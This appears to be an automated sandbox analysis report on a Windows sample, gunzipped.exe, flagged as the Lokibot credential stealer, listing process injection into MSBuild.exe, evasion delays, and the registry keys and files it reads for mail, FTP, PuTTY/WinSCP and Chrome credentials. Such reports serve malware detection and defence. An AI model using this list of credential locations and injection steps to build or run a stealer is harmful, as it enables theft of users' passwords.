                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: gunzipped.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: gunzipped.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: .pdbBSJB source: gunzipped.exe, 00000000.00000002.670163943.0000000000A40000.00000004.00020000.sdmp

                Data Obfuscation:

                barindex
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1852, type: MEMORYSTR
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_00007FFA363D402D push es; retn 7002h
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_00007FFA363D7974 pushad ; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402AC0 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402AC0 push eax; ret
                Source: initial sampleStatic PE information: section name: .text entropy: 7.8171876408
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\gunzipped.exe TID: 7156Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5520Thread sleep time: -540000s >= -30000s
                Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\gunzipped.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                Source: gunzipped.exe, 00000000.00000002.672703663.0000000012895000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000002.672557288.00000000127C4000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000002.672618979.000000001281A000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000002.672382490.0000000012729000.00000004.00000001.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                Source: gunzipped.exe, 00000000.00000002.672816240.0000000012933000.00000004.00000001.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\gunzipped.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 415000
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41A000
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4A0000
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A5008
                .NET source code references suspicious native API functionsShow sources
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                Allocates memory in foreign processesShow sources
                Source: C:\Users\user\Desktop\gunzipped.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\gunzipped.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                Source: MSBuild.exe, 00000001.00000002.931751642.00000000012E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                Source: MSBuild.exe, 00000001.00000002.931751642.00000000012E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: MSBuild.exe, 00000001.00000002.931751642.00000000012E0000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: MSBuild.exe, 00000001.00000002.931751642.00000000012E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Users\user\Desktop\gunzipped.exe VolumeInformation
                Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406069 GetUserNameW,

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.931659993.0000000000C58000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.734712266.0000000000C6F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1852, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: PopPassword
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: SmtpPassword
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE
